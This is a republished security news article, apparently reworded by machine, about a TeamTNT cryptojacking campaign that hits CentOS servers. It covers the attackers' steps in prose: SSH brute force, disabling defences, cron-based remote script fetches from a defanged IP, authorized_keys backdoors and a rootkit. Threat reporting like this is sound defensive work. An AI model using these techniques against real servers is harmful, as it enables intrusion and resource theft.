Close Menu
Indo Guard OnlineIndo Guard Online
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
What's Hot

Google exposes Vishing Group UNC6040 target on Salesforce with a fake app for a data loader

June 4, 2025

Malicious Chaos Rats are aimed at Windows and Linux via fake network downloads

June 4, 2025

Why do traditional DLP solutions do not get in the browser era

June 4, 2025
Facebook X (Twitter) Instagram
Facebook X (Twitter) Instagram YouTube
Indo Guard OnlineIndo Guard Online
Subscribe
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
Indo Guard OnlineIndo Guard Online
Home » TeamTNT’s new Cryptojacking campaign targets CentOS servers with rootkits
Global Security

TeamTNT’s new Cryptojacking campaign targets CentOS servers with rootkits

AdminBy AdminSeptember 19, 2024No Comments3 Mins Read
CentOS Servers with Rootkit
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link


September 19, 2024Ravi LakshmananCryptojacking / Cloud Security

CentOS servers with rootkits

A cryptojacking operation known as Team TNT has probably relaunched as part of a new campaign targeting virtual private server (VPS) infrastructure based on the CentOS operating system.

“The initial access was accomplished through a brute-force Secure Shell (SSH) attack on the victim’s assets, during which the threat actor downloaded a malicious script,” Group-IB researchers Vito Alfano and Nam Le Phuong said in Wednesday’s report.

The malicious script, the Singapore-based cybersecurity firm noted, is responsible for disabling security features, deleting logs, halting cryptocurrency mining processes, and preventing recovery.

Attack chains ultimately pave the way for deployment Diamorphine rootkit to hide malicious processes as well as to set up permanent remote access to the compromised host.

The campaign was attributed to TeamTNT with moderate confidence, citing similarities in observed tactics, techniques and procedures (TTP).

Cyber ​​security

TeamTNT was first discovered in the wild in 2019, carrying out illegal cryptocurrency mining activities by infiltrating cloud and container environments. Although the Threat actor said goodbye in November 2021, announcing a “clean exit”, public reports revealed several companies started by a team of hackers since then September 2022.

Recent activity associated with a group is detected as a shell script that first checks to see if it has been previously infected by other hacking operations, then compromises the device by disabling SELinuxAppArmor and Firewall.

Changes have been made to the ssh service

“The script looks for a daemon associated with Alibaba’s cloud provider called aliyun.service,” the researchers said. “When it detects this daemon, it downloads a bash script from update.aegis.aliyun.com to remove the service.”

In addition to stopping all competing cryptocurrency mining processes, the script takes steps to execute a series of commands to remove traces left by other miners, stop container processes, and remove images deployed in association with any coin miners.

He also ensures resiliency by setting up cron jobs that download a shell script every 30 minutes from a remote server (65.108.48(.)150) and modifying the “/root/.ssh/authorized_keys” file to add a backdoor account.

“It locks down the system by changing file attributes, creating a backdoor root user, and erasing the command history to hide its activity,” the researchers noted. “A threat actor leaves nothing to chance; indeed, the script implements various changes to the configuration of the SSH service and the firewall.’

Did you find this article interesting? Follow us Twitter  and LinkedIn to read more exclusive content we publish.





Source link

Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Admin
  • Website

Related Posts

Google exposes Vishing Group UNC6040 target on Salesforce with a fake app for a data loader

June 4, 2025

Malicious Chaos Rats are aimed at Windows and Linux via fake network downloads

June 4, 2025

Why do traditional DLP solutions do not get in the browser era

June 4, 2025

Packages malicious Pypi, NPM and Rubin

June 4, 2025

HPE releases security patch for Storeonce error, which allows by -by -distance authentication

June 4, 2025

Fake Docusign, Gitcode Sites Distributed Netsupport Rat Through Multiple Attack PowerShell

June 3, 2025
Add A Comment
Leave A Reply Cancel Reply

Loading poll ...
Coming Soon
Do You Like Our Website
: {{ tsp_total }}

Subscribe to Updates

Get the latest security news from Indoguardonline.com

Latest Posts

Google exposes Vishing Group UNC6040 target on Salesforce with a fake app for a data loader

June 4, 2025

Malicious Chaos Rats are aimed at Windows and Linux via fake network downloads

June 4, 2025

Why do traditional DLP solutions do not get in the browser era

June 4, 2025

Packages malicious Pypi, NPM and Rubin

June 4, 2025

HPE releases security patch for Storeonce error, which allows by -by -distance authentication

June 4, 2025

Fake Docusign, Gitcode Sites Distributed Netsupport Rat Through Multiple Attack PowerShell

June 3, 2025

Critical 10-year Error Webmail RoundCube allows users to run the malicious code

June 3, 2025

Understanding the scammers and how to defend their organization

June 3, 2025
About Us
About Us

Provide a constantly updating feed of the latest security news and developments specific to Indonesia.

Facebook X (Twitter) Pinterest YouTube WhatsApp
Our Picks

Google exposes Vishing Group UNC6040 target on Salesforce with a fake app for a data loader

June 4, 2025

Malicious Chaos Rats are aimed at Windows and Linux via fake network downloads

June 4, 2025

Why do traditional DLP solutions do not get in the browser era

June 4, 2025
Most Popular

In Indonesia, crippling immigration ransomware breach sparks privacy crisis

July 6, 2024

Why Indonesia’s Data Breach Crisis Calls for Better Security

July 6, 2024

Indonesia’s plan to integrate 27,000 govt apps in one platform welcomed but data security concerns linger

July 6, 2024
© 2025 indoguardonline.com
  • Home
  • About us
  • Contact us
  • Privacy Policy

Type above and press Enter to search. Press Esc to cancel.